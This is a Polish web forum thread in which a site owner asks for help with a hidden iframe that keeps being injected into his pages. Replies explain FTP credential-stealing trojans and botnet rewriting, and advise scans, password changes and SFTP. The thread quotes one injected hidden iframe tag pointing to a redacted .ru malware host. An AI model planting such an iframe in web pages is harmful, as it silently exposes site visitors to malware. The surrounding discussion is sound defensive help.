Zabezpieczenie przed iframe

[T O M E K]

Witam czy jest jakiś kod który by nie pozwalał wyświetlić iframe na mojej stronie zmieniałem hasła , zmieniałem klienty fttp , zmieniałem cmsy , skanowałem komputer i nic nie pomogło kody są w tym stylu

Kod:

<iframe src="http://[deleted].ru:8080/index.php" width=169 height=189 style="visibility: hidden"></iframe>

Proszę o pomoc

[herki]

Masz tutaj analize trojana ktory dokleja kod http://novirusthanks.org/blog/2009/0...hidden-iframe/.
Musisz wykonac kilka czynnosci:

• przeskanowac kompa programem antywirusowym z ktorego laczysz sie na ftp serwera
• uaktualnienie programu ktorym laczysz sie z ftp
• zmiana hasel do ftp
• usuniecie linkow IFRAME z plikow na ftp

[T O M E K]

Robiłem już to dużo razy ale kod po 2 miechach przychodził :/
Dzięki za zainteresowanie naprawdę ciekawa strona
@Edit
Mam chyba jakiś inny wirus bo tych plików nie mam

Kod:

C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe

[TQM]

Jest wirusik/trojan co kradnie hasla do FTP i wtedy ladnie modyfikuje stronki wstawiajac IFRAME'y - niedawno takie cos obserwowalem, polaczenia co pare minut z roznych adresow IP, nigdy sie IP nie powtorzylo...

1. Jakis IP sie laczy jako istniejacy user i pobiera od razu wlasciwy plik i logout
2. pare sekund pozniej polaczenie jako ten sam user z innego IP, upload podmienionego pliku, logout
3. akcja powtarza sie pare razy, zmieniajac iframe...

Widac botnet majacy 'swiadomosc' tego co robia zombie, w jakis sposob musi dzielic informacje... calkiem mozliwe ze to botnet wynajmowany 'na godziny' bo w ciagu 15 minut plik byl zmieniany 8 razy, za kazdym razem wstawiajac inny iframe do innego malware. Technicznie mowiac jestem pod wrazeniem :P

[T O M E K]

Coraz więcej osób ma z tym problemy jak się czyta w necie ,znalazłem spis tych gówien
http://www.malwareurl.com/search.php...verse=on&as=on
Nie wiem co robić czy to koniec ery bezpiecznych stron ?

[TQM]

Jesli ktos do aktualizacji plikow uzywa FTP to nie mozna mowic o bezpiecznych stronach

EDIT:
Zabezpieczac to trzeba sie nie przed IFRAME ale przed uzywaniem FTP, bo to jest glowny sposob w jaki te iframe'y trafiaja na serwery... Probujesz naprawiac symptomy zamiast zajac sie przyczynami problemu

[T O M E K]

Może i racja domyślam się że trzeba skorzystać z sFTP ale nie mogę znaleźć artykułu podrzuci ktoś linka ? tylko po polsku
( w mozilli jest taka opcja ale nie umiem się połączyć)

[Mad_Dud]

Zamykam.
off-topic się robi.

PS. W celu skorzystania z innych protokołów wymiany plików, skontaktuj się z administratorem.